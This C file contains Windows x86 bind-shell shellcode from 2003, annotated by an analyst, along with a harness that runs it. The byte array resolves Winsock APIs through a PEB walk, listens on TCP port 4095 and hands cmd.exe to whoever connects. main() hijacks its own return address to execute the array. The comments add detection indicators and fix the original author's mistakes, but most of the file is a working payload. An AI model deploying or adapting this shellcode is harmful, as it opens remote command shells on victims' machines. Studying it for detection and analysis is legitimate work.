// The Dark Raver
// 26/01/2003
// 554 bytes
// BINDSHELL + CMD
// - Port: 4095
// - Find API offsets
// - With Nulls
// - With ExitThread()
//
// Analyst's summary of the byte array below (derived from the encoded
// instructions, not from the original comments, which are corrected where
// they disagree with the bytes):
//  1. Prologue reserves a 0x258-byte frame.
//  2. Reads the PEB through %fs:0x30 and walks the loader module list to get
//     a DLL base (the author labels it kernel_base; which module the second
//     list entry is depends on the OS version -- not verifiable from here).
//  3. Scans that module's export name table for a name starting with
//     "GetProcA" (the two cmpl immediates are "GetP" and "rocA") and resolves
//     the matching export address into %ebx.
//  4. Resolves CreateProcessA, ExitThread, LoadLibraryA; loads ws2_32.dll and
//     resolves WSAStartup, WSASocketA, bind, listen, accept.
//  5. WSAStartup / WSASocketA(2,1,...) / bind on 0.0.0.0, port word 0xff0f
//     (= 4095 in network order) / listen(5) / accept.
//  6. Zeroes PROCESS_INFORMATION and STARTUPINFOA on the stack, sets
//     dwFlags=0x101 (STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW) and points
//     hStdInput/hStdOutput/hStdError at the accepted socket, then
//     CreateProcessA("cmd.exe", bInheritHandles=1) and ExitThread.
// Observable indicators: a new TCP listener on port 4095, a cmd.exe child
// whose three standard handles are a socket, and the %fs:0x30 / export-table
// walk that generic shellcode signatures key on. All structure offsets
// (PEB 0x0c/0x1c, LDR entry 0x08, PE 0x3c/0x78, export dir 0x18/0x1c/0x20/0x24)
// are 32-bit Windows layouts; NX/DEP on the data segment stops the harness
// in main() from ever reaching this code.
//
// Note on the storage slots: the resolved function pointers are stored at
// POSITIVE %ebp offsets (0x04..0x2C). After "push %ebp; mov %esp,%ebp",
// 0x04(%ebp) is the return-address slot and everything above it belongs to
// the caller's frame, so these stores clobber the caller's stack. The code
// never returns (it ends in ExitThread), which is why this is tolerated.
char hell[]=
// ---- Build the table of API calls ----
// Prologue
"\x55" /* push %ebp */
"\x89\xe5" /* mov %esp,%ebp */
"\x81\xec\x58\x02\x00\x00" /* sub $0x258,%esp */
// get_kernel_base: PEB -> Ldr (0x0c) -> InInitializationOrderModuleList (0x1c)
"\x64\xa1\x30\x00\x00\x00" /* mov %fs:0x30,%eax */
"\x8b\x40\x0c" /* mov 0xc(%eax),%eax */
"\x8b\x70\x1c" /* mov 0x1c(%eax),%esi */
"\xad" /* lods %ds:(%esi),%eax  -- Flink: advance to the second list entry */
"\x8b\x40\x08" /* mov 0x8(%eax),%eax -- DllBase of that entry */
// kern_base in eax; saved on the stack for the three GetProcAddress calls below
"\x50" /* push %eax */
// get_getprocaddress: %ecx = base, %edi = export directory, %esi = name table
"\x8b\xc8" /* mov %eax,%ecx */
"\x03\x40\x3c" /* add 0x3c(%eax),%eax  -- e_lfanew -> PE header */
"\x8b\x78\x78" /* mov 0x78(%eax),%edi  -- export directory RVA */
"\x03\xf9" /* add %ecx,%edi */
"\x8b\x77\x20" /* mov 0x20(%edi),%esi  -- AddressOfNames RVA */
"\x03\xf1" /* add %ecx,%esi */
"\x33\xd2" /* xor %edx,%edx            -- name index */
// loop: compare the first 8 bytes of each export name with "GetProcA"
"\x8b\x06" /* mov (%esi),%eax */
"\x03\xc1" /* add %ecx,%eax */
"\x81\x38\x47\x65\x74\x50" /* cmpl $0x50746547,(%eax)     -- "GetP" */
"\x75\x1e" /* jne +0x1e  -> add $0x4,%esi (next name) */
"\x81\x78\x04\x72\x6f\x63\x41" /* cmpl $0x41636f72,0x4(%eax) -- "rocA" */
"\x75\x15" /* jne +0x15  -> add $0x4,%esi (next name) */
// match: ordinal = AddressOfNameOrdinals[edx]; ebx = base + AddressOfFunctions[ordinal]
"\x8b\x47\x24" /* mov 0x24(%edi),%eax  -- AddressOfNameOrdinals RVA */
"\x03\xc1" /* add %ecx,%eax */
"\x0f\xb7\x1c\x50" /* movzwl (%eax,%edx,2),%ebx */
"\x8b\x47\x1c" /* mov 0x1c(%edi),%eax  -- AddressOfFunctions RVA */
"\x03\xc1" /* add %ecx,%eax */
"\x8b\x1c\x98" /* mov (%eax,%ebx,4),%ebx */
"\x01\xcb" /* add %ecx,%ebx */
"\xeb\x09" /* jmp +9  -> pop %eax (loop exit) */
"\x83\xc6\x04" /* add $0x4,%esi */
"\x42" /* inc %edx */
"\x3b\x57\x18" /* cmp 0x18(%edi),%edx  -- NumberOfNames */
"\x75\xcd" /* jne -0x33  -> mov (%esi),%eax (top of loop); original comment said -32 */
// getprocaddress in ebx. No match => falls through with %ebx unset (no error path).
"\x58" /* pop %eax */
"\x50" /* push %eax */
// push &"CreateProcessA": the call pushes the string address and skips over it
"\xe8\x0f\x00\x00\x00" /* call +15 (0x0f = strlen("CreateProcessA")+1; original comment said +13) */
"CreateProcessA\x00" /* command string */
"\x50" /* push %eax */
// CreateProcessA=GetProcAddress(kernel_base, "CreateProcessA")
"\xff\xd3" // call *%ebx
"\x89\x45\x04" /* mov %eax,0x04(%ebp)  -- return-address slot, see header note */
"\x58" /* pop %eax */
"\x50" /* push %eax */
// push &"ExitThread"
"\xe8\x0b\x00\x00\x00" /* call +11 */
"ExitThread\x00" /* command string */
"\x50" /* push %eax */
// ExitThread=GetProcAddress(kernel_base, "ExitThread")
"\xff\xd3" // call *%ebx
"\x89\x45\x2C" /* mov %eax,0x2C(%ebp) */
"\x58" /* pop %eax  -- last use of the saved kernel_base copy */
// push &"LoadLibraryA"
"\xe8\x0d\x00\x00\x00" /* call +13 */
"LoadLibraryA\x00" /* command string */
"\x50" /* push %eax */
// LoadLibraryA=GetProcAddress(kernel_base, "LoadLibraryA")
"\xff\xd3" // call *%ebx
// ws2_32.dll=LoadLibraryA("ws2_32.dll")
// push &"ws2_32.dll"
"\xe8\x0b\x00\x00\x00" /* call +11 (original comment said +12) */
"ws2_32.dll\x00" /* command string */
// call LoadLibraryA, still in %eax (it is never stored; the 0x1C slot listed below is unused)
"\xff\xd0" /* call *%eax */
//"\x89\x45\x28" /* mov %eax,0x28(%ebp) */
"\x8b\xf0" /* mov %eax,%esi  -- ws2_32.dll base kept in %esi */
// push &"WSAStartup"
"\xe8\x0b\x00\x00\x00" /* call +11 */
"WSAStartup\x00" /* command string */
"\x56" /* push %esi */
// WSAStartup=GetProcAddress(ws2_32.dll, "WSAStartup")
"\xff\xd3" // call *%ebx
"\x89\x45\x08" /* mov %eax,0x8(%ebp) */
// push &"WSASocketA"
"\xe8\x0b\x00\x00\x00" /* call +11 */
"WSASocketA\x00" /* command string */
"\x56" /* push %esi */
// WSASocketA=GetProcAddress(ws2_32.dll, "WSASocketA")
"\xff\xd3" // call *%ebx
"\x89\x45\x0C" /* mov %eax,0xC(%ebp) */
// push &"bind"
"\xe8\x05\x00\x00\x00" /* call +5 (original comment said +11) */
"bind\x00" /* command string */
"\x56" /* push %esi */
// bind=GetProcAddress(ws2_32.dll, "bind")
"\xff\xd3" // call *%ebx
"\x89\x45\x10" /* mov %eax,0x10(%ebp) */
// push &"listen"
"\xe8\x07\x00\x00\x00" /* call +7 (original comment said +11) */
"listen\x00" /* command string */
"\x56" /* push %esi */
// listen=GetProcAddress(ws2_32.dll, "listen")
"\xff\xd3" // call *%ebx
"\x89\x45\x14" /* mov %eax,0x14(%ebp) */
// push &"accept"
"\xe8\x07\x00\x00\x00" /* call +7 (original comment said +11) */
"accept\x00" /* command string */
"\x56" /* push %esi */
// accept=GetProcAddress(ws2_32.dll, "accept")
"\xff\xd3" // call *%ebx
"\x89\x45\x18" /* mov %eax,0x18(%ebp) */
// -----------------------------------------
// Slot map as the author intended. Only the slots marked (stored) are ever
// written by the bytes above; LoadLibraryA, GetProcAddress, kernel_base and
// ws2_32.dll live in %eax, %ebx, the stack and %esi respectively.
// LoadLibraryA = 0x1C(%ebp)     (never stored)
// GetProcAddress = 0x20(%ebp)   (never stored; in %ebx)
// kernel_base = 0x24(%ebp)      (never stored)
// ws2_32.dll = 0x28(%ebp)       (store commented out; in %esi)
// ExitThread = 0x2C(%ebp)       (stored)
// CreateProcessA = 0x04(%ebp)   (stored)
// WSAStartup = 0x08(%ebp)       (stored)
// WSASocketA = 0x0C(%ebp)       (stored)
// bind = 0x10(%ebp)             (stored)
// listen = 0x14(%ebp)           (stored)
// accept = 0x18(%ebp)           (stored)
// ---- socket + bind + listen + accept ----
// x = 16;   (sockaddr length passed to accept)
// &x = 0xfffffde4(%ebp)
"\xc7\x85\xe4\xfd\xff\xff\x10\x00\x00\x00" /* movl $0x10,0xfffffde4(%ebp) */
// WSAStartup(257, &info);   0x101 = Winsock version 1.1
// &info = 0xfffffe68(%ebp)
"\x8d\x85\x68\xfe\xff\xff" /* lea 0xfffffe68(%ebp),%eax */
"\x50" /* push %eax */
"\x68\x01\x01\x00\x00" /* push $0x101 */
// call WSAStartup = 0x08(%ebp); return value is not checked
"\x8b\x45\x08" /* mov 0x08(%ebp),%eax */
"\xff\xd0" /* call *%eax */
// hDes=WSASocket(2, 1, 0, 0, 0, 0);   AF_INET, SOCK_STREAM
"\x6a\x00" /* push $0x0 */
"\x6a\x00" /* push $0x0 */
"\x6a\x00" /* push $0x0 */
"\x6a\x00" /* push $0x0 */
"\x6a\x01" /* push $0x1 */
"\x6a\x02" /* push $0x2 */
// call WSASocket = 0x71A35A01 = 0x0C   (the absolute address is a stale note; slot 0x0C(%ebp) is used)
"\x8b\x45\x0C" /* mov 0x0C(%ebp),%eax */
"\xff\xd0" /* call *%eax */
// &hDes=0xfffffe60(%ebp)
"\x89\x85\x60\xfe\xff\xff" /* mov %eax,0xfffffe60(%ebp) */
// serv_addr.sin_family = 2;   AF_INET
// &serv_addr = 0xfffffde8(%ebp)
"\x66\xc7\x85\xe8\xfd\xff\xff\x02\x00" /* movw $0x2,0xfffffde8(%ebp) */
// serv_addr.sin_port = 65295;   0xff0f stored little-endian = bytes 0f ff = port 4095 on the wire
"\x66\xc7\x85\xea\xfd\xff\xff\x0f\xff" /* movw $0xff0f,0xfffffdea(%ebp) */
// serv_addr.sin_addr.s_addr = 0;   INADDR_ANY: listens on every interface
"\xc7\x85\xec\xfd\xff\xff\x00\x00\x00\x00" /* movl $0x0,0xfffffdec(%ebp) */
// hSock = bind(hDes, (struct sockaddr *)&serv_addr, 16);
"\x6a\x10" /* push $0x10 */
"\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */
"\x50" /* push %eax */
// call bind = 0x71A33ECE = 0x10   (slot 0x10(%ebp); return value not checked)
"\x8b\x45\x10" /* mov 0x10(%ebp),%eax */
"\xff\xd0" /* call *%eax */
// hSock = listen(hDes, 5);
"\x6a\x05" /* push $0x5 */
"\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */
"\x50" /* push %eax */
// call listen = 0x71A35DE2 = 0x14   (slot 0x14(%ebp))
"\x8b\x45\x14" /* mov 0x14(%ebp),%eax */
"\xff\xd0" /* call *%eax */
// hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x);   blocks until a client connects
"\x8d\x85\xe4\xfd\xff\xff" /* lea 0xfffffde4(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */
"\x50" /* push %eax */
// call accept = 0x71A3868D = 0x18   (slot 0x18(%ebp))
"\x8b\x45\x18" /* mov 0x18(%ebp),%eax */
"\xff\xd0" /* call *%eax */
// &hSock=0xfffffe64(%ebp)
"\x89\x85\x64\xfe\xff\xff" /* mov %eax,0xfffffe64(%ebp) */
// ---- Launch cmd.exe ----
// memset(&piProcInfo, 0, 16);   NOTE: %ecx is loaded with 0x16 = 22, not 16 --
// the extra bytes are still inside the frame, so this only over-zeroes.
// &piProcInfo=0xfffffe48(%ebp)
"\x8d\xbd\x48\xfe\xff\xff" /* lea 0xfffffe48(%ebp),%edi */
"\xb0\x00" /* mov $0x0,%al */
"\xb9\x16\x00\x00\x00" /* mov $0x16,%ecx */
"\xf3\xaa" /* repz stos */
// memset(&siStartInfo, 0, 68);   NOTE: %ecx = 0x68 = 104, not 68; the run
// extends up to 0xfffffe60(%ebp), just below hDes/hSock, and overlaps the
// already-zeroed piProcInfo. Harmless here, but the pseudocode is wrong.
// &siStartInfo= 0xfffffdf8(%ebp)
"\x8d\xbd\xf8\xfd\xff\xff" /* lea 0xfffffdf8(%ebp),%edi */
"\xb0\x00" /* mov $0x0,%al */
"\xb9\x68\x00\x00\x00" /* mov $0x68,%ecx */
"\xf3\xaa" /* repz stos */
// STARTUPINFOA fields, as offsets from siStartInfo (0xfffffdf8):
//siStartInfo.dwFlags = 256 | 1;        +0x2c
//siStartInfo.wShowWindow = 0;          +0x30
//siStartInfo.hStdOutput = hSock;       +0x3c
//siStartInfo.hStdError = hSock;        +0x40
//siStartInfo.hStdInput = hSock;        +0x38
// The cb field at +0x00 is left at zero.
"\xc7\x85\x24\xfe\xff\xff\x01\x01\x00\x00" /* movl $0x101,0xfffffe24(%ebp) */
"\x66\xc7\x85\x28\xfe\xff\xff\x00\x00" /* movw $0x0,0xfffffe28(%ebp) */
"\x8b\x85\x64\xfe\xff\xff" /* mov 0xfffffe64(%ebp),%eax */
"\x89\x85\x34\xfe\xff\xff" /* mov %eax,0xfffffe34(%ebp) */
"\x89\x85\x38\xfe\xff\xff" /* mov %eax,0xfffffe38(%ebp) */
"\x89\x85\x30\xfe\xff\xff" /* mov %eax,0xfffffe30(%ebp) */
// CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo);
// Arguments are pushed right-to-left (stdcall); bInheritHandles=1 is what
// hands the socket to the child as its console handles.
"\x8d\x85\x48\xfe\xff\xff" /* lea 0xfffffe48(%ebp),%eax  -- &piProcInfo */
"\x50" /* push %eax */
"\x8d\x85\xf8\xfd\xff\xff" /* lea 0xfffffdf8(%ebp),%eax  -- &siStartInfo */
"\x50" /* push %eax */
"\x6a\x00" /* push $0x0  -- lpCurrentDirectory */
"\x6a\x00" /* push $0x0  -- lpEnvironment */
"\x6a\x00" /* push $0x0  -- dwCreationFlags */
"\x6a\x01" /* push $0x1  -- bInheritHandles */
"\x6a\x00" /* push $0x0  -- lpThreadAttributes */
"\x6a\x00" /* push $0x0  -- lpProcessAttributes */
// push &cmd.exe  (lpCommandLine)
"\xe8\x08\x00\x00\x00" /* call +8 */
"cmd.exe\x00" /* command string */
"\x6a\x00" /* push $0x0  -- lpApplicationName */
// call CreateProcessA = 0x04(%ebp)
"\x8b\x45\x04" /* mov 0x04(%ebp),%eax */
"\xff\xd0" /* call *%eax */
// call ExitThread = 0x2C(%ebp); %eax (CreateProcessA's BOOL) is passed as the exit code
"\x8b\x45\x2C" /* mov 0x2C(%ebp),%eax */
"\xff\xd0" /* call *%eax */
"";
// TDR
// Test harness: prints the array size and then overwrites main's own return
// address so that "return" lands in hell[].  This is undefined behaviour: it
// assumes a 32-bit x86 frame in which the return address sits exactly two
// ints above the local `ret`, and that hell[] (writable data) is executable.
// Any compiler/ABI change or NX/DEP breaks it.  `%d` with a size_t argument
// is also a format/argument type mismatch (should be %zu).
int main() {
 int *ret;
 printf("%d\n",sizeof(hell));
 ret = (int *)&ret + 2;
 (*ret) = (int)hell;
}